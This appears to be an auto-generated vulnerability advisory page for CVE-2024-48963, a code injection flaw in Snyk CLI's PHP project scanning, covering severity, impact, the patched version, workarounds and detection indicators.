CVE-2024-48963 – Snyk CLI versions before 1.1294.0 are vulnerabl... (How to Fix)

Q: What is the severity of CVE-2024-48963?

CVE-2024-48963 has a CVSS score of 7.5 (HIGH). Snyk CLI versions before 1.1294.0 are vulnerable to code injection when scanning untrusted PHP projects. Attackers can execute arbitrary code by tricking users into running 'snyk test' within a malicious project directory. This affects developers and security teams using Snyk CLI for PHP project analysis.

📋 TL;DR

Snyk CLI versions before 1.1294.0 are vulnerable to code injection when scanning untrusted PHP projects. Attackers can execute arbitrary code by tricking users into running 'snyk test' within a malicious project directory. This affects developers and security teams using Snyk CLI for PHP project analysis.

💻 Affected Systems

Products:

Snyk CLI

Versions: All versions before 1.1294.0

Operating Systems: All platforms running Snyk CLI

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects PHP project scanning functionality. Requires running 'snyk test' command within an untrusted project directory.

📦 What is this software?

Snyk Cli by Snyk

View all CVEs affecting Snyk Cli →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining the same privileges as the user running Snyk CLI, potentially leading to data theft, ransomware deployment, or lateral movement.

🟠

Likely Case

Local privilege escalation or arbitrary code execution within the context of the user running Snyk, allowing attackers to steal credentials, modify files, or install malware.

🟢

If Mitigated

No impact if scanning only trusted projects or using patched versions.

🌐 Internet-Facing: LOW - This requires local access or social engineering to execute malicious code.

🏢 Internal Only: MEDIUM - Developers scanning untrusted code repositories or third-party dependencies could be exploited.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user interaction (running snyk test) and access to modify project directory names. No authentication bypass needed beyond local file system access.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1294.0

Vendor Advisory: https://github.com/snyk/snyk-php-plugin/releases/tag/v1.10.0

Restart Required: No

Instructions:

1. Update Snyk CLI: npm update -g snyk 2. Verify version: snyk --version 3. Ensure version is 1.1294.0 or higher

🔧 Temporary Workarounds

Avoid scanning untrusted projects

all

Only run Snyk test on trusted PHP projects as recommended by vendor

Sandbox scanning environment

linux

Run Snyk CLI in isolated containers or VMs when scanning third-party code

docker run --rm -v $(pwd):/app snyk/snyk-cli test

🧯 If You Can't Patch

Restrict Snyk CLI usage to trusted administrators only
Implement mandatory code review before Snyk scanning of external projects

🔍 How to Verify

Check if Vulnerable:

Run: snyk --version and check if version is below 1.1294.0

Check Version:

snyk --version

Verify Fix Applied:

Run: snyk --version and confirm version is 1.1294.0 or higher

📡 Detection & Monitoring

Log Indicators:

Unexpected process execution from Snyk CLI
Snyk test commands running in unusual directories

Network Indicators:

Outbound connections from Snyk process to unexpected destinations

SIEM Query:

process.name:snyk AND process.args:*test* AND file.path:*untrusted*

📊 Metadata

CVE ID: CVE-2024-48963

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: October 23, 2024

Last Updated: October 30, 2024

🔗 References

https://github.com/snyk/snyk-php-plugin/releases/tag/v1.10.0 Release Notes

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-48963, you might also want to check these: